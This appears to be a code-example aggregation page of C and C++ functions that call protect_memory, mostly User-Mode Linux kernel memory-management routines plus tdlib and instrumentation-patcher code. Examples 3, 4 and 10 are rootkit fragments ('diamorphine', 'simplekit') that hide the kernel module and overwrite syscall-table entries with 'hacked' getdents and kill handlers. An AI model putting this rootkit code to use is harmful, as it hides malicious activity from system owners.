Exemplo n.º 1
0
static void mprotect_kernel_mem(int w)
{
	unsigned long start, end;
	int pages;

	if(!jail || (current == &init_task)) return;

	pages = (1 << CONFIG_KERNEL_STACK_ORDER);

	start = (unsigned long) current_thread + PAGE_SIZE;
	end = (unsigned long) current_thread + PAGE_SIZE * pages;
	protect_memory(uml_reserved, start - uml_reserved, 1, w, 1, 1);
	protect_memory(end, high_physmem - end, 1, w, 1, 1);

	start = (unsigned long) UML_ROUND_DOWN(&_stext);
	end = (unsigned long) UML_ROUND_UP(&_etext);
	protect_memory(start, end - start, 1, w, 1, 1);

	start = (unsigned long) UML_ROUND_DOWN(&_unprotected_end);
	end = (unsigned long) UML_ROUND_UP(&_edata);
	protect_memory(start, end - start, 1, w, 1, 1);

	start = (unsigned long) UML_ROUND_DOWN(&__bss_start);
	end = (unsigned long) UML_ROUND_UP(brk_start);
	protect_memory(start, end - start, 1, w, 1, 1);

	mprotect_kernel_vm(w);
}
Exemplo n.º 2
0
static void do_ops(int unused, struct host_vm_op *ops, int last)
{
	struct host_vm_op *op;
	int i;

	for(i = 0; i <= last; i++){
		op = &ops[i];
		switch(op->type){
		case MMAP:
                        os_map_memory((void *) op->u.mmap.addr, op->u.mmap.fd,
				      op->u.mmap.offset, op->u.mmap.len,
				      op->u.mmap.r, op->u.mmap.w,
				      op->u.mmap.x);
			break;
		case MUNMAP:
			os_unmap_memory((void *) op->u.munmap.addr,
					op->u.munmap.len);
			break;
		case MPROTECT:
			protect_memory(op->u.mprotect.addr, op->u.munmap.len,
				       op->u.mprotect.r, op->u.mprotect.w,
				       op->u.mprotect.x, 1);
			break;
		default:
			printk("Unknown op type %d in do_ops\n", op->type);
			break;
		}
	}
}
Exemplo n.º 3
0
static int __init
diamorphine_init(void)
{
	unsigned int level;

	sys_call_table = get_syscall_table_bf();
	if (!sys_call_table)
		return -1;

	pte = lookup_address((unsigned long)sys_call_table, &level);
	if (!pte)
		return -1;

	module_hide();
	tidy();

	orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents];
	orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64];
	orig_kill = (orig_kill_t)sys_call_table[__NR_kill];

	unprotect_memory();
	sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents;
	sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64;
	sys_call_table[__NR_kill] = (unsigned long)hacked_kill;
	protect_memory();

	return 0;
}
Exemplo n.º 4
0
static void __exit
diamorphine_cleanup(void)
{
	unprotect_memory();
	sys_call_table[__NR_getdents] = (unsigned long)orig_getdents;
	sys_call_table[__NR_getdents64] = (unsigned long)orig_getdents64;
	sys_call_table[__NR_kill] = (unsigned long)orig_kill;
	protect_memory();
}
Exemplo n.º 5
0
static void protect_vm_page(unsigned long addr, int w, int must_succeed)
{
	int err;

	err = protect_memory(addr, PAGE_SIZE, 1, w, 1, must_succeed);
	if(err == 0) return;
	else if((err == -EFAULT) || (err == -ENOMEM)){
		flush_tlb_kernel_range(addr, addr + PAGE_SIZE);
		protect_vm_page(addr, w, 1);
	}
	else panic("protect_vm_page : protect failed, errno = %d\n", err);
}
Exemplo n.º 6
0
Status setup_signals_alt_stack() {
#if TD_PORT_POSIX && !TD_DARWIN_TV_OS && !TD_DARWIN_WATCH_OS
  auto page_size = getpagesize();
  auto stack_size = (MINSIGSTKSZ + 16 * page_size - 1) / page_size * page_size;

  void *stack = mmap(nullptr, stack_size + 2 * page_size, PROT_READ | PROT_WRITE, MAP_PRIVATE | MAP_ANON, -1, 0);
  if (stack == MAP_FAILED) {
    return OS_ERROR("Mmap failed");
  }

  TRY_STATUS(protect_memory(stack, page_size));
  TRY_STATUS(protect_memory(static_cast<char *>(stack) + stack_size + page_size, page_size));

  stack_t signal_stack;
  signal_stack.ss_sp = static_cast<char *>(stack) + page_size;
  signal_stack.ss_size = stack_size;
  signal_stack.ss_flags = 0;

  if (sigaltstack(&signal_stack, nullptr) != 0) {
    return OS_ERROR("sigaltstack failed");
  }
#endif
  return Status::OK();
}
Exemplo n.º 7
0
static void flush_kernel_vm_range(unsigned long start, unsigned long end, 
				  int update_seq)
{
	struct mm_struct *mm;
	pgd_t *pgd;
	pmd_t *pmd;
	pte_t *pte;
	unsigned long addr;
	int updated = 0, err;

	mm = &init_mm;
	for(addr = start; addr < end;){
		pgd = pgd_offset(mm, addr);
		pmd = pmd_offset(pgd, addr);
		if(pmd_present(*pmd)){
			pte = pte_offset_kernel(pmd, addr);
			if(!pte_present(*pte) || pte_newpage(*pte)){
				updated = 1;
				err = os_unmap_memory((void *) addr, 
						      PAGE_SIZE);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
				if(pte_present(*pte))
					map_memory(addr, 
						   pte_val(*pte) & PAGE_MASK,
						   PAGE_SIZE, 1, 1, 1);
			}
			else if(pte_newprot(*pte)){
				updated = 1;
				protect_memory(addr, PAGE_SIZE, 1, 1, 1, 1);
			}
			addr += PAGE_SIZE;
		}
		else {
			if(pmd_newpage(*pmd)){
				updated = 1;
				err = os_unmap_memory((void *) addr, PMD_SIZE);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
			}
			addr += PMD_SIZE;
		}
	}
	if(updated && update_seq) atomic_inc(&vmchange_seq);
}
Exemplo n.º 8
0
void finish_fork_handler(int sig)
{
 	UPT_SC(&current->thread.regs.regs) = (void *) (&sig + 1);
	suspend_new_thread(current->thread.mode.tt.switch_pipe[0]);

	force_flush_all();
	if(current->thread.prev_sched != NULL)
		schedule_tail(current->thread.prev_sched);
	current->thread.prev_sched = NULL;

	enable_timer();
	change_sig(SIGVTALRM, 1);
	local_irq_enable();
	if(current->mm != current->parent->mm)
		protect_memory(uml_reserved, high_physmem - uml_reserved, 1, 
			       1, 0, 1);
	task_protections((unsigned long) current_thread);

	free_page(current->thread.temp_stack);
	local_irq_disable();
	change_sig(SIGUSR1, 0);
	set_user_mode(current);
}
Exemplo n.º 9
0
void flush_thread_tt(void)
{
	unsigned long stack;
	int new_pid;

	stack = alloc_stack(0, 0);
	if(stack == 0){
		printk(KERN_ERR 
		       "flush_thread : failed to allocate temporary stack\n");
		do_exit(SIGKILL);
	}
		
	new_pid = start_fork_tramp(task_stack_page(current), stack, 0, exec_tramp);
	if(new_pid < 0){
		printk(KERN_ERR 
		       "flush_thread : new thread failed, errno = %d\n",
		       -new_pid);
		do_exit(SIGKILL);
	}

	if(current_thread->cpu == 0)
		forward_interrupts(new_pid);
	current->thread.request.op = OP_EXEC;
	current->thread.request.u.exec.pid = new_pid;
	unprotect_stack((unsigned long) current_thread);
	os_usr1_process(os_getpid());
	change_sig(SIGUSR1, 1);

	change_sig(SIGUSR1, 0);
	enable_timer();
	free_page(stack);
	protect_memory(uml_reserved, high_physmem - uml_reserved, 1, 1, 0, 1);
	stack_protections((unsigned long) current_thread);
	force_flush_all();
	unblock_signals();
}
Exemplo n.º 10
0
// 커널 모듈을 로드할 때 수행
static int __init
simplekit_init(void)
{
	sys_call_table = get_syscall_table_bf();
	if (!sys_call_table)
		return -1;

	cr0 = read_cr0();

	module_hide();
	tidy();

	orig_getdents = (orig_getdents_t)sys_call_table[__NR_getdents];
	orig_getdents64 = (orig_getdents64_t)sys_call_table[__NR_getdents64];
	orig_kill = (orig_kill_t)sys_call_table[__NR_kill];

	unprotect_memory();
	sys_call_table[__NR_getdents] = (unsigned long)hacked_getdents;
	sys_call_table[__NR_getdents64] = (unsigned long)hacked_getdents64;
	sys_call_table[__NR_kill] = (unsigned long)hacked_kill;
	protect_memory();

	return 0;
}
Exemplo n.º 11
0
void unprotect_stack(unsigned long stack)
{
	protect_memory(stack, (1 << CONFIG_KERNEL_STACK_ORDER) * PAGE_SIZE, 
		       1, 1, 0, 1);
}
Exemplo n.º 12
0
void flush_tlb_kernel_range_skas(unsigned long start, unsigned long end)
{
	struct mm_struct *mm;
	pgd_t *pgd;
	pud_t *pud;
	pmd_t *pmd;
	pte_t *pte;
	unsigned long addr, last;
	int updated = 0, err;

	mm = &init_mm;
	for(addr = start; addr < end;){
		pgd = pgd_offset(mm, addr);
		pud = pud_offset(pgd, addr);
		pmd = pmd_offset(pud, addr);
 		if(!pgd_present(*pgd)){
			if(pgd_newpage(*pgd)){
				updated = 1;
				last = addr + PGDIR_SIZE;
				if(last > end)
					last = end;
				err = os_unmap_memory((void *) addr, 
						      last - addr);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
			}
			addr += PGDIR_SIZE;
			continue;
		}

		pud = pud_offset(pgd, addr);
		if(!pud_present(*pud)){
			if(pud_newpage(*pud)){
				updated = 1;
				last = addr + PUD_SIZE;
				if(last > end)
					last = end;
				err = os_unmap_memory((void *) addr,
						      last - addr);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
			}
			addr += PUD_SIZE;
			continue;
		}

		pmd = pmd_offset(pud, addr);
		if(!pmd_present(*pmd)){
			if(pmd_newpage(*pmd)){
				updated = 1;
				last = addr + PMD_SIZE;
				if(last > end)
					last = end;
				err = os_unmap_memory((void *) addr,
						      last - addr);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
			}
			addr += PMD_SIZE;
			continue;
		}

		pte = pte_offset_kernel(pmd, addr);
		if(!pte_present(*pte) || pte_newpage(*pte)){
			updated = 1;
			err = os_unmap_memory((void *) addr, PAGE_SIZE);
			if(err < 0)
				panic("munmap failed, errno = %d\n", -err);
			if(pte_present(*pte))
				map_memory(addr, pte_val(*pte) & PAGE_MASK,
					   PAGE_SIZE, 1, 1, 1);
		}
		else if(pte_newprot(*pte)){
			updated = 1;
			protect_memory(addr, PAGE_SIZE, 1, 1, 1, 1);
  		}
		addr += PAGE_SIZE;
	}
}
Exemplo n.º 13
0
static void fix_range(struct mm_struct *mm, unsigned long start_addr, 
		      unsigned long end_addr, int force)
{
	pgd_t *npgd;
	pmd_t *npmd;
	pte_t *npte;
	unsigned long addr;
	int r, w, x, err;

	if((current->thread.mode.tt.extern_pid != -1) && 
	   (current->thread.mode.tt.extern_pid != os_getpid()))
		panic("fix_range fixing wrong address space, current = 0x%p",
		      current);
	if(mm == NULL) return;
	for(addr=start_addr;addr<end_addr;){
		if(addr == TASK_SIZE){
			/* Skip over kernel text, kernel data, and physical
			 * memory, which don't have ptes, plus kernel virtual
			 * memory, which is flushed separately, and remap
			 * the process stack.  The only way to get here is
			 * if (end_addr == STACK_TOP) > TASK_SIZE, which is
			 * only true in the honeypot case.
			 */
			addr = STACK_TOP - ABOVE_KMEM;
			continue;
		}
		npgd = pgd_offset(mm, addr);
		npmd = pmd_offset(npgd, addr);
		if(pmd_present(*npmd)){
			npte = pte_offset_kernel(npmd, addr);
			r = pte_read(*npte);
			w = pte_write(*npte);
			x = pte_exec(*npte);
			if(!pte_dirty(*npte)) w = 0;
			if(!pte_young(*npte)){
				r = 0;
				w = 0;
			}
			if(force || pte_newpage(*npte)){
				err = os_unmap_memory((void *) addr, 
						      PAGE_SIZE);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
				if(pte_present(*npte))
					map_memory(addr, 
						   pte_val(*npte) & PAGE_MASK,
						   PAGE_SIZE, r, w, x);
			}
			else if(pte_newprot(*npte)){
				protect_memory(addr, PAGE_SIZE, r, w, x, 1);
			}
			*npte = pte_mkuptodate(*npte);
			addr += PAGE_SIZE;
		}
		else {
			if(force || pmd_newpage(*npmd)){
				err = os_unmap_memory((void *) addr, PMD_SIZE);
				if(err < 0)
					panic("munmap failed, errno = %d\n",
					      -err);
				pmd_mkuptodate(*npmd);
			}
			addr += PMD_SIZE;
		}
	}
}
Exemplo n.º 14
0
COLDWRAPPER(____jf_modify_instrumentation, void *FP, uintptr_t *Info,
            uint8_t patchout) {
  // Extra element in pointer array is used for state tracking
  uintptr_t *flag = &Info[1];

  PatchInfo * patchInfo = (PatchInfo*)(Info + 3);
  bool on = true;

  if (false) // Enable to check for unpatched bb arrays
  if ((*flag & PATCHED_MASK) != PATCHED_MAGIC) {
    if (!user_warned)
      ____jf_logger("WARNING: Didn't run patcher, or incomplete patched binary.\n");
    abort();
    user_warned = true;
    return;
  }

  if (patchout == 1) patch_me_out<1>();

  // If this is already instrumented appropriately, we're done!
  uintptr_t flag_val = on ? 1 : 0;
  if ((*flag & FLAG_MASK) == flag_val)
    return;

  jfdebug("[P]: Rewriting instrumentation to %s (fp=%p,info=%p)\n",
          on ? "on" : "off", FP, Info);

  uintptr_t count = Info[0];
  // I don't know if this is possible, but for safety, do it!
  if (!count)
    return;
  uintptr_t maxoffset = patchInfo[count - 1].patchoffset + 5;
  protect_memory(FP, maxoffset, true);

  #ifndef NDEBUG
  if (false) // Enable for sanity-checking patch arrays
  for (unsigned i = 0; i < count; ++i) {
    assert(patchInfo[i].patchoffset);
    char * bytes = on ? patchInfo[i].primebytes : patchInfo[i].codebytes;
    char * altbytes = !on ? patchInfo[i].primebytes : patchInfo[i].codebytes;
    const unsigned char *code =
        (const unsigned char *)FP + patchInfo[i].patchoffset;
    assert((FP <= code) && (code + 5 <= (const unsigned char *)FP + maxoffset));
    assert(read5(code) == read5(bytes) || read5(code) == read5(altbytes));
  }
  #endif

  for (unsigned i = 0; i < count; ++i) {
    char * bytes = on ? patchInfo[i].primebytes : patchInfo[i].codebytes;
    unsigned char * code = (unsigned char*)FP + patchInfo[i].patchoffset;
    jfdebug("[P]: Writing %05x to %p\n", read5(bytes), code);
    jfdebug("[P]: %p is currently %05x\n", code, read5(code));
    memcpy(code, bytes, sizeof(patchInfo[i].primebytes));
  }

  // Rewrite entry to use fully instrumented version:
  uintptr_t InstrFP = Info[2];
  if (InstrFP) {
    unsigned char jump[5] = { 0xE9 }; // 32bit relative
    uintptr_t offset = InstrFP - (uintptr_t(FP) + 5);
    uint32_t off32 = offset;
    *(uint32_t*)&jump[1] = off32;
    jfdebug("[P]: Offset: %x\n", off32);
    jfdebug("[P]: Writing %05x to %p\n", read5(jump), FP);
    jfdebug("[P]: %p is currently %05x\n", FP, read5(FP));
    memcpy(FP, jump, sizeof(jump));
  }

  protect_memory(FP, maxoffset, false);
  *flag |= (flag_val & FLAG_MASK);
}